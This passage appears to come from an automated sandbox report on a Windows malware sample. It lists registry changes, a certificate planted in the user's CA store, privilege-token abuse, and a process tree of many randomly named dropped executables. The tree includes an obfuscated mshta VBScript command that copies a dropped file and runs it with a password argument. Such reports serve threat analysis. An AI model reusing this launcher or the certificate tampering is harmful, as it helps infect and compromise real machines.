| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B | C:\Users\Admin\AppData\Local\Temp\is-PT2V0.tmp\Setup.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 | C:\Users\Admin\AppData\Local\Temp\is-PT2V0.tmp\Setup.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (31).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (31).exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\VmatnQDkGajHqVCN5qoRwFKw.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\VmatnQDkGajHqVCN5qoRwFKw.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\VmatnQDkGajHqVCN5qoRwFKw.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\3SIzjMcbtGMIkPC0hWFEJsgR.exe | N/A |
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\3149759.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\ZyGUs27gecV6eAGW7VJZ0w9C.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\uHOiH_2iL26qxgcHVqyiIsgk.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\fhODPSKluiNQ0Pu0qNfCpnA0.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\7312180.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\U0qg5OeBRy2wHno8PFCKoguA.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\_7LCE8eXNKPVMTjbVBUp34Tw.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Conhost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\wQnYcwTFdlCGSxJ7X54kBjwQ.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8B972.tmp\chfTpfsIhk2k8cljoC8x4lEy.tmp | N/A |
| N/A | N/A | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-OMSLM.tmp\Inlog.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-VBCFN.tmp\WEATHER Manager.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-L1S5H.tmp\VPN.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-PT2V0.tmp\Setup.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup (31).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (31).exe"
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv AQ4ciwWch0+5spMnjZvMow.0.2
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Users\Admin\Documents\83BotY7zekRTK847HrWIewXZ.exe
"C:\Users\Admin\Documents\83BotY7zekRTK847HrWIewXZ.exe"
C:\Users\Admin\Documents\_7LCE8eXNKPVMTjbVBUp34Tw.exe
"C:\Users\Admin\Documents\_7LCE8eXNKPVMTjbVBUp34Tw.exe"
C:\Users\Admin\Documents\VmatnQDkGajHqVCN5qoRwFKw.exe
"C:\Users\Admin\Documents\VmatnQDkGajHqVCN5qoRwFKw.exe"
C:\Users\Admin\Documents\fhODPSKluiNQ0Pu0qNfCpnA0.exe
"C:\Users\Admin\Documents\fhODPSKluiNQ0Pu0qNfCpnA0.exe"
C:\Users\Admin\Documents\U0qg5OeBRy2wHno8PFCKoguA.exe
"C:\Users\Admin\Documents\U0qg5OeBRy2wHno8PFCKoguA.exe"
C:\Users\Admin\Documents\ZyGUs27gecV6eAGW7VJZ0w9C.exe
"C:\Users\Admin\Documents\ZyGUs27gecV6eAGW7VJZ0w9C.exe"
C:\Users\Admin\Documents\DgwUCSUm2EGoDKzrKphU5yue.exe
"C:\Users\Admin\Documents\DgwUCSUm2EGoDKzrKphU5yue.exe"
C:\Users\Admin\Documents\5NzdQgNoL2Hd8YFQhpV3RI2V.exe
"C:\Users\Admin\Documents\5NzdQgNoL2Hd8YFQhpV3RI2V.exe"
C:\Users\Admin\Documents\6bHi9nzObsq3d4KNm11c6Eml.exe
"C:\Users\Admin\Documents\6bHi9nzObsq3d4KNm11c6Eml.exe"
C:\Users\Admin\Documents\uHOiH_2iL26qxgcHVqyiIsgk.exe
"C:\Users\Admin\Documents\uHOiH_2iL26qxgcHVqyiIsgk.exe"
C:\Users\Admin\Documents\wQnYcwTFdlCGSxJ7X54kBjwQ.exe
"C:\Users\Admin\Documents\wQnYcwTFdlCGSxJ7X54kBjwQ.exe"
C:\Users\Admin\Documents\yMYgDoN5ZlPFh65_uPIocVpq.exe
"C:\Users\Admin\Documents\yMYgDoN5ZlPFh65_uPIocVpq.exe"
C:\Users\Admin\Documents\chfTpfsIhk2k8cljoC8x4lEy.exe
"C:\Users\Admin\Documents\chfTpfsIhk2k8cljoC8x4lEy.exe"
C:\Users\Admin\AppData\Local\Temp\is-8B972.tmp\chfTpfsIhk2k8cljoC8x4lEy.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8B972.tmp\chfTpfsIhk2k8cljoC8x4lEy.tmp" /SL5="$18001E,138429,56832,C:\Users\Admin\Documents\chfTpfsIhk2k8cljoC8x4lEy.exe"
C:\Users\Admin\Documents\L8WRQMlpeAVDYBe1g8EXl7az.exe
"C:\Users\Admin\Documents\L8WRQMlpeAVDYBe1g8EXl7az.exe"
C:\Users\Admin\Documents\_7LCE8eXNKPVMTjbVBUp34Tw.exe
C:\Users\Admin\Documents\_7LCE8eXNKPVMTjbVBUp34Tw.exe
C:\Users\Admin\Documents\5NzdQgNoL2Hd8YFQhpV3RI2V.exe
C:\Users\Admin\Documents\5NzdQgNoL2Hd8YFQhpV3RI2V.exe
C:\Users\Admin\AppData\Roaming\7312180.exe
"C:\Users\Admin\AppData\Roaming\7312180.exe"
C:\Users\Admin\Documents\5NzdQgNoL2Hd8YFQhpV3RI2V.exe
C:\Users\Admin\Documents\5NzdQgNoL2Hd8YFQhpV3RI2V.exe
C:\Users\Admin\Documents\PMUOXlkoMDg8DAIz4tJrckfK.exe
"C:\Users\Admin\Documents\PMUOXlkoMDg8DAIz4tJrckfK.exe"
C:\Users\Admin\Documents\eKqSKHZZ2JFiGVSyFjfDNb1j.exe
"C:\Users\Admin\Documents\eKqSKHZZ2JFiGVSyFjfDNb1j.exe"
C:\Users\Admin\Documents\G7QyhA8sJ7kHeEyy4wYfFRug.exe
"C:\Users\Admin\Documents\G7QyhA8sJ7kHeEyy4wYfFRug.exe"
C:\Users\Admin\AppData\Roaming\4529314.exe
"C:\Users\Admin\AppData\Roaming\4529314.exe"
C:\Users\Admin\Documents\VmatnQDkGajHqVCN5qoRwFKw.exe
"C:\Users\Admin\Documents\VmatnQDkGajHqVCN5qoRwFKw.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2956 -ip 2956
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2956 -s 292
C:\Users\Admin\AppData\Roaming\4817824.exe
"C:\Users\Admin\AppData\Roaming\4817824.exe"
C:\Users\Admin\Documents\E6TRgkpLt1N0zENcY_UZeYQx.exe
"C:\Users\Admin\Documents\E6TRgkpLt1N0zENcY_UZeYQx.exe"
C:\Users\Admin\Documents\5tUBHcAl1axgrDZU8jXaJml_.exe
"C:\Users\Admin\Documents\5tUBHcAl1axgrDZU8jXaJml_.exe"
C:\Users\Admin\Documents\fCzC67EUFmJ5B97GO7XkTwsJ.exe
"C:\Users\Admin\Documents\fCzC67EUFmJ5B97GO7XkTwsJ.exe"
C:\Users\Admin\Documents\r3sUVpG8YzDn117UsLb5R5OU.exe
"C:\Users\Admin\Documents\r3sUVpG8YzDn117UsLb5R5OU.exe"
C:\Users\Admin\Documents\MqvI8Cq4rKJpl1rZaYA3UHxb.exe
"C:\Users\Admin\Documents\MqvI8Cq4rKJpl1rZaYA3UHxb.exe"
C:\Users\Admin\Documents\lcuipBJpFrvOQm_Mceqsl0ox.exe
"C:\Users\Admin\Documents\lcuipBJpFrvOQm_Mceqsl0ox.exe"
C:\Users\Admin\Documents\QLXqt3I4VSrifZucS_spgEli.exe
"C:\Users\Admin\Documents\QLXqt3I4VSrifZucS_spgEli.exe"
C:\Users\Admin\Documents\tNuGeSEEQylXg1KTa9XqWCIK.exe
"C:\Users\Admin\Documents\tNuGeSEEQylXg1KTa9XqWCIK.exe"
C:\Users\Admin\Documents\X4uQJh2aEqCvnclCc_PZbhYa.exe
"C:\Users\Admin\Documents\X4uQJh2aEqCvnclCc_PZbhYa.exe"
C:\Users\Admin\Documents\9dY8lwHbaM85prcqOGGjFq3O.exe
"C:\Users\Admin\Documents\9dY8lwHbaM85prcqOGGjFq3O.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2568 -ip 2568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3120 -ip 3120
C:\Users\Admin\Documents\fhODPSKluiNQ0Pu0qNfCpnA0.exe
"C:\Users\Admin\Documents\fhODPSKluiNQ0Pu0qNfCpnA0.exe"
C:\Users\Admin\AppData\Roaming\6075649.exe
"C:\Users\Admin\AppData\Roaming\6075649.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2568 -s 312
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5064 -ip 5064
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3120 -s 316
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4380 -ip 4380
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\E6TRgkpLt1N0zENcY_UZeYQx.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\E6TRgkpLt1N0zENcY_UZeYQx.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4380 -s 288
C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-N1VBB.tmp\Setup.exe" /Verysilent
C:\Users\Admin\Documents\fCzC67EUFmJ5B97GO7XkTwsJ.exe
C:\Users\Admin\Documents\fCzC67EUFmJ5B97GO7XkTwsJ.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\E6TRgkpLt1N0zENcY_UZeYQx.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\E6TRgkpLt1N0zENcY_UZeYQx.exe" ) do taskkill -f -iM "%~NxA"
C:\Windows\SysWOW64\WerFault.exe
